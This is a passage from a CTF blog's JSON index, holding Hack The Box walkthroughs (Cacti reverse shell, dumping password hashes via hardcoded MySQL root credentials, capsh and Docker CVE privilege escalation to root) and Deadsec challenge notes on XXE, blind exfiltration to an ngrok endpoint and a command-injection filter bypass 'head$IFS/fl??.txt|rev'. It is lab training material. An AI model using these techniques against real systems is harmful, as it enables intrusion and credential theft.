it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17  Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds   As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\n Looking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19  #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34;   As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 2  mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34;   We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}]
\ No newline at end of file